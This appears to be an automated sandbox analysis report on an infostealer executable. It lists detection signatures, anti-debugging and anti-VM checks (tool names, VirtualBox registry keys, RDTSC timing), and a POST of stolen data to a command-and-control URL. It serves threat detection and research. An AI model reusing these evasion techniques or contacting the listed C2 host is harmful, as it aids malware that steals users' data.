Windows Analysis Report
B43WRnzSPD.exe

Overview

General Information

Sample name: B43WRnzSPD.exe (renamed because original name is a hash value)
Original sample name: 76e5a31451eefe694a963ae5b65ecff2.exe
Analysis ID: 1579965
MD5: 76e5a31451eefe694a963ae5b65ecff2
SHA1: 5517f0db4c84c605574c618567afa40274a1c7a1
SHA256: 3955f6fc16ce4d34bd50409f6f98825d3568e370f9f980d8e82dfbe8d7dbd04c
Tags: exe, user-abuse_ch
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • B43WRnzSPD.exe (PID: 2664 cmdline: "C:\Users\user\Desktop\B43WRnzSPD.exe" MD5: 76E5A31451EEFE694A963AE5B65ECFF2)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: B43WRnzSPD.exeAvira: detected
Source: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850?argument=Avira URL Cloud: Label: malware
Source: http://home.twentytk20ht.top/TQAvira URL Cloud: Label: malware
Source: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850::3Avira URL Cloud: Label: malware
Source: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850http://home.twentytk20ht.top/TQIuuaqjNpwYAvira URL Cloud: Label: malware
Source: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850fd4Avira URL Cloud: Label: malware
Source: Submitted SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: B43WRnzSPD.exeJoe Sandbox ML: detected
Source: B43WRnzSPD.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: mov dword ptr [ebp+04h], 424D53FFh1_2_0066A5B0
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: mov dword ptr [ebx+04h], 424D53FFh1_2_0066A7F0
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: mov dword ptr [edi+04h], 424D53FFh1_2_0066A7F0
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: mov dword ptr [esi+04h], 424D53FFh1_2_0066A7F0
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: mov dword ptr [ebx+04h], 424D53FFh1_2_0066B560
Source: B43WRnzSPD.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_0060255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,1_2_0060255D
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_006029FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,1_2_006029FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1Host: home.twentytk20ht.topAccept: */*Content-Type: application/jsonContent-Length: 442861
Source: global trafficHTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1Host: home.twentytk20ht.topAccept: */*Content-Type: application/jsonContent-Length: 128Data Ascii: { "id1": "<html><body><h1>504 Gateway Time-out<\/h1>\nThe server didn't respond in time.\n<\/body><\/html>\n", "data": "Done1" }
Source: Joe Sandbox ViewIP Address: 185.121.15.192 185.121.15.192
Source: Joe Sandbox ViewIP Address: 98.85.100.80 98.85.100.80
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_006CA8C0 recvfrom,1_2_006CA8C0
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.twentytk20ht.top
Source: unknownHTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1Host: home.twentytk20ht.topAccept: */*Content-Type: application/jsonContent-Length: 442861
Source: B43WRnzSPD.exe, 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.css
Source: B43WRnzSPD.exe, 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.jpg
Source: B43WRnzSPD.exe, 00000001.00000003.2018361388.0000000001924000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20ht.top/TQ
Source: B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFoj850
Source: B43WRnzSPD.exe, 00000001.00000002.2020371855.00000000018B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
Source: B43WRnzSPD.exe, 00000001.00000003.2018790782.00000000018B7000.00000004.00000020.00020000.00000000.sdmp, B43WRnzSPD.exe, 00000001.00000003.2018770520.00000000018B2000.00000004.00000020.00020000.00000000.sdmp, B43WRnzSPD.exe, 00000001.00000002.2020371855.00000000018B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850::3
Source: B43WRnzSPD.exe, B43WRnzSPD.exe, 00000001.00000002.2020839491.0000000001925000.00000004.00000020.00020000.00000000.sdmp, B43WRnzSPD.exe, 00000001.00000003.2018015700.00000000018C1000.00000004.00000020.00020000.00000000.sdmp, B43WRnzSPD.exe, 00000001.00000003.2018386317.00000000018C7000.00000004.00000020.00020000.00000000.sdmp, B43WRnzSPD.exe, 00000001.00000002.2020572030.00000000018C8000.00000004.00000020.00020000.00000000.sdmp, B43WRnzSPD.exe, 00000001.00000003.2017988366.0000000001913000.00000004.00000020.00020000.00000000.sdmp, B43WRnzSPD.exe, 00000001.00000003.2018071816.0000000001920000.00000004.00000020.00020000.00000000.sdmp, B43WRnzSPD.exe, 00000001.00000003.2018361388.0000000001924000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850?argument=
Source: B43WRnzSPD.exe, 00000001.00000003.2018790782.00000000018B7000.00000004.00000020.00020000.00000000.sdmp, B43WRnzSPD.exe, 00000001.00000003.2018770520.00000000018B2000.00000004.00000020.00020000.00000000.sdmp, B43WRnzSPD.exe, 00000001.00000002.2020371855.00000000018B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850fd4
Source: B43WRnzSPD.exe, 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850http://home.twentytk20ht.top/TQIuuaqjNpwY
Source: B43WRnzSPD.exe, 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://html4/loose.dtd
Source: B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: B43WRnzSPD.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: B43WRnzSPD.exe, B43WRnzSPD.exe, 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: B43WRnzSPD.exe, 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ip
Source: B43WRnzSPD.exe, 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705

System Summary

Source: B43WRnzSPD.exeStatic PE information: section name:
Source: B43WRnzSPD.exeStatic PE information: section name: .idata
Source: B43WRnzSPD.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: String function: 006073F0 appears 100 times
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: String function: 00645340 appears 34 times
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: String function: 00644F40 appears 269 times
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: String function: 007B7220 appears 86 times
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: String function: 007DCBC0 appears 71 times
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: String function: 00644FD0 appears 200 times
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: String function: 0061CCD0 appears 53 times
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: String function: 006075A0 appears 545 times
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: String function: 0061CD40 appears 63 times
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: String function: 006E44A0 appears 56 times
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: String function: 006450A0 appears 77 times
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: String function: 006071E0 appears 40 times
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: String function: 0060CAA0 appears 62 times
Source: B43WRnzSPD.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: B43WRnzSPD.exeStatic PE information: Section: acnazlro ZLIB complexity 0.9944080769368211
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@6/2
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_0060255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,1_2_0060255D
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_006029FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,1_2_006029FF
Source: C:\Users\user\Desktop\B43WRnzSPD.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\B43WRnzSPD.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: B43WRnzSPD.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: B43WRnzSPD.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: kernel.appcore.dllJump to behavior
Source: B43WRnzSPD.exeStatic file information: File size 4441600 > 1048576
Source: B43WRnzSPD.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x283400
Source: B43WRnzSPD.exeStatic PE information: Raw size of acnazlro is bigger than: 0x100000 < 0x1b5400

Data Obfuscation

Source: C:\Users\user\Desktop\B43WRnzSPD.exeUnpacked PE file: 1.2.B43WRnzSPD.exe.600000.0.unpack :EW;.rsrc:W;.idata :W; :EW;acnazlro:EW;qaecibqv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;acnazlro:EW;qaecibqv:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: B43WRnzSPD.exeStatic PE information: real checksum: 0x4409bd should be: 0x4430ba
Source: B43WRnzSPD.exeStatic PE information: section name:
Source: B43WRnzSPD.exeStatic PE information: section name: .idata
Source: B43WRnzSPD.exeStatic PE information: section name:
Source: B43WRnzSPD.exeStatic PE information: section name: acnazlro
Source: B43WRnzSPD.exeStatic PE information: section name: qaecibqv
Source: B43WRnzSPD.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_3_018FB135 push eax; iretd 1_3_018FB151
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_3_018EC370 pushad ; ret 1_3_018EC371
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_3_018FB2A3 pushad ; retf 1_3_018FB2B1
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_3_018DAB7B push esi; retn 0047h1_3_018DABFA
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_009841D0 push eax; mov dword ptr [esp], edx1_2_009841D5
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_00682340 push eax; mov dword ptr [esp], 00000000h1_2_00682343
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_006BC7F0 push eax; mov dword ptr [esp], 00000000h1_2_006BC743
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_00640AC0 push eax; mov dword ptr [esp], 00000000h1_2_00640AC4
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_00661430 push eax; mov dword ptr [esp], 00000000h1_2_00661433
Source: B43WRnzSPD.exeStatic PE information: section name: acnazlro entropy: 7.955898170729066

Boot Survival

Source: C:\Users\user\Desktop\B43WRnzSPD.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeWindow searched: window name: FilemonclassJump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\B43WRnzSPD.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Source: B43WRnzSPD.exe, 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
Source: B43WRnzSPD.exe, 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
Source: B43WRnzSPD.exe, 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WINDBG.EXE
Source: B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: B43WRnzSPD.exe, 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EF20EF second address: EF20F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EF31E2 second address: EF31E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EF22EA second address: EF22EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EF22EE second address: EF22F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EF3327 second address: EF332D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EF332D second address: EF3346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c je 00007F262CBE4E88h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pushad 0x00000015 push esi 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: E9F19E second address: E9F1A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: E9F1A3 second address: E9F1A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: E9F1A9 second address: E9F1B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EFF23E second address: EFF260 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F262CBE4E98h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EFF260 second address: EFF266 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: E9000D second address: E90011 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: E90011 second address: E90015 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EFEB20 second address: EFEB3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F262CBE4E99h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EFEB3F second address: EFEB5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F262D38FB17h 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EFEE57 second address: EFEE5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EFEE5C second address: EFEE78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F262D38FB06h 0x0000000a jmp 00007F262D38FB12h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F04DAA second address: F04DAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F04EEA second address: F04F03 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F262D38FB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007F262D38FB08h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F04F03 second address: F04F0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F262CBE4E86h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F04FD3 second address: F05008 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB14h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F262D38FB1Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F05008 second address: F05019 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F262CBE4E8Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F0965E second address: F09668 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F262D38FB1Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F0992A second address: F0993D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E8Ch 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F09A8A second address: F09A97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F09A97 second address: F09AB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007F262CBE4E92h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F09D83 second address: F09D8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F09D8D second address: F09D91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F09D91 second address: F09D97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F09D97 second address: F09DA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
